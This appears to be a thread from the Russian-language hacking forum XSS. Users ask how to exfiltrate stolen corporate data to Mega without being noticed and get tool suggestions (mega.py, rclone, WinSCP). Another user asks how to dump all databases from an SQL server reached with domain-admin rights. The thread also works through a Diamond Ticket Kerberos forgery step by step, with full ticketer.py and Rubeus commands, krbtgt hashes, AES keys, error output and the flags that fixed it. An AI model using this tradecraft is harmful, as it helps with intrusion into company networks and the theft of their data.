• XSS.stack #1 – первый литературный журнал от юзеров форума

[net-hacking] Вопросы по сетям

Перейти к новому Отслеживать
Blu-ray сказал(а):
Всем привет! Как и чем правильно корп дату качать на мегу?
Подскажите пожалуйста
Как правильно я не знаю, но я эксперементировал скриптами на Python c библиотекой https://github.com/odwyersoftware/mega.py
 
Blu-ray сказал(а):
А результат экспериментов успешный был?
Да вполне, только у меня не было цели не шуметь и не передовал большие файлы, думаю тебе нужно что-то другое для слива даты, я winscp пользуюся для закачки на свои серваки , не на мегу
 
Wolverine сказал(а):
Да вполне, только у меня не было цели не шуметь и не передовал большие файлы, думаю тебе нужно что-то другое для слива даты, я winscp пользуюся для закачки на свои серваки , не на мегу
Вот и я хотел сначала WinSCP но потом решил что мегой будет проще и дешевле, однако щас затык в том что не понимаю как это сделать :)
 
Blu-ray сказал(а):
Вот и я хотел сначала WinSCP но потом решил что мегой будет проще и дешевле, однако щас затык в том что не понимаю как это сделать :)
rclone
 
Приветствую коллеги!
У меня в локальной сети есть доступ к sql серверу по рдп, права домен админ
Как грамотно с него сдампить все бд подскажите пожалуйста
 
Товарищи, кто подскажет, ситуация такая:

Решил на тестовом стенде провести атаку Diamond Ticket, все условия выполнил, билет получил, однако при попытке его использовать для доступа к сервису получаю вот это:
Код: 
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

Взял хэш и aes ключ krbtgt и с помощью ticketer изменил пак указанного пользака и получил билет:
Код: 
ticketer.py -request -domain 'megacompany.local' -user 'Administrator' -password 'P@sSw0rd123!' -nthash 'b7ae28796a23fb1e136264ffaec24a58' -aesKey '96a2da05e77a1fccfd669a823d5073d06b34c7165200c62f8185d4160dd57a43' -domain-sid 'S-1-5-21-3525099022-2802752472-390520141' w.johnson

Закинул в переменную, проверил klist:

Код: 
Ticket cache: FILE:w.johnson.ccache
Default principal: w.johnson@MEGACOMPANY.LOCAL

Valid starting       Expires              Service principal
07/17/2025 23:35:20  07/15/2035 23:35:20  krbtgt/MEGACOMPANY.LOCAL@MEGACOMPANY.LOCAL
        renew until 07/15/2035 23:35:20

Пытаюсь залететь в шару:
Код: 
KRB5CCNAME=w.johnson.ccache smbclient.py -k -no-pass DC.megacompany.local
- получаю указанную выше ошибку.

Точно такая же хрень на локальной тачке через Рубеус, тоже Revoked. Как я понял сервис не принимает мой билет, в чем причина?
 
Hello, having a big issue, some details:
-Host connected to vpn
-VM with (tried): NAT/ Host-only adapter with ICS enabled from the VPN adapter/ NAT Network (virtualbox)
-VM connected to a fortinet vpn

My main problem is that when im connected to the VPN on the host im not able to discover hosts from the vm

A solution is greatly appreciated
 
asifiknow сказал(а):
Товарищи, кто подскажет, ситуация такая:

Решил на тестовом стенде провести атаку Diamond Ticket, все условия выполнил, билет получил, однако при попытке его использовать для доступа к сервису получаю вот это:
Код: 
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

Взял хэш и aes ключ krbtgt и с помощью ticketer изменил пак указанного пользака и получил билет:
Код: 
ticketer.py -request -domain 'megacompany.local' -user 'Administrator' -password 'P@sSw0rd123!' -nthash 'b7ae28796a23fb1e136264ffaec24a58' -aesKey '96a2da05e77a1fccfd669a823d5073d06b34c7165200c62f8185d4160dd57a43' -domain-sid 'S-1-5-21-3525099022-2802752472-390520141' w.johnson

Закинул в переменную, проверил klist:

Код: 
Ticket cache: FILE:w.johnson.ccache
Default principal: w.johnson@MEGACOMPANY.LOCAL

Valid starting       Expires              Service principal
07/17/2025 23:35:20  07/15/2035 23:35:20  krbtgt/MEGACOMPANY.LOCAL@MEGACOMPANY.LOCAL
        renew until 07/15/2035 23:35:20

Пытаюсь залететь в шару:
Код: 
KRB5CCNAME=w.johnson.ccache smbclient.py -k -no-pass DC.megacompany.local
- получаю указанную выше ошибку.

Точно такая же хрень на локальной тачке через Рубеус, тоже Revoked. Как я понял сервис не принимает мой билет, в чем причина?
Либо убери nthash, и оставь только аес, либо добавь флажок user-id, в рубеус используй /ldap , он сам подтянет необходимые поля
 
Exited3n сказал(а):
Либо убери nthash, и оставь только аес, либо добавь флажок user-id, в рубеус используй /ldap , он сам подтянет необходимые поля
Спасибо, на линухе выручил, сработало с user-id.

С Рубеусом пока не выходит. Пробовал с флагом /ldap. Чисто из спортивного интереса уже охота добить)

Тут все как надо:

Код: 
[*] Decrypting TGT                                                                                                     
[*] Retreiving PAC                                                                                                     
[*] Modifying PAC                                                                                                     
[*] Signing PAC                                                                                                       
[*] Encrypting Modified TGT                                                                                                                                                                                                                   
[*] base64(ticket.kirbi):


Далее копирую тикет в следующую команду
Код: 
./rubeus.exe asktgs /ticket: <билет> /service:cifs/DC.megacompany.local /ptt /nowrap:

И получаю:

Код: 
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/DC.megacompany.local'
[*] Using domain controller: DC.megacompany.local (192.168.1.155)
[X] KRB-ERROR (20) : KDC_ERR_TGT_REVOKED
 
asifiknow сказал(а):
Спасибо, на линухе выручил, сработало с user-id.

С Рубеусом пока не выходит. Пробовал с флагом /ldap. Чисто из спортивного интереса уже охота добить)

Тут все как надо:

Код: 
[*] Decrypting TGT                                                                                                    
[*] Retreiving PAC                                                                                                    
[*] Modifying PAC                                                                                                    
[*] Signing PAC                                                                                                      
[*] Encrypting Modified TGT                                                                                                                                                                                                                  
[*] base64(ticket.kirbi):


Далее копирую тикет в следующую команду
Код: 
./rubeus.exe asktgs /ticket: <билет> /service:cifs/DC.megacompany.local /ptt /nowrap:

И получаю:

Код: 
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/DC.megacompany.local'
[*] Using domain controller: DC.megacompany.local (192.168.1.155)
[X] KRB-ERROR (20) : KDC_ERR_TGT_REVOKED
Ну ты не пишешь полную команду рубеуса где rubeus golden blah blah, вот так делай - Rubeus.exe golden /user:domain_admin /aes256:405e8c77dc526256753f51c847561c7ad732d6e4ded9c374c3f7f02f602e3844 /ldap /nowrap /ptt
 
Exited3n сказал(а):
Ну ты не пишешь полную команду рубеуса где rubeus golden blah blah, вот так делай - Rubeus.exe golden /user:domain_admin /aes256:405e8c77dc526256753f51c847561c7ad732d6e4ded9c374c3f7f02f602e3844 /ldap /nowrap /ptt
Разобрался, оказывается в Рубеус так же надо было добавить флаг /ticketuserid
 
asifiknow сказал(а):
Разобрался, оказывается в Рубеус так же надо было добавить флаг /ticketuserid
Хорошо что разобрался, но вообще по /ldap он сам должен поля заполнить необходимые, проверь последнюю ли версию скомпилировал и используешь (v2.3.3 должно быть)

Вот здесь хорошая репа с собранными Си шарп бинарями - https://github.com/Flangvik/SharpCollection
Хотя рекомендую компилить самому из первоисточника
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх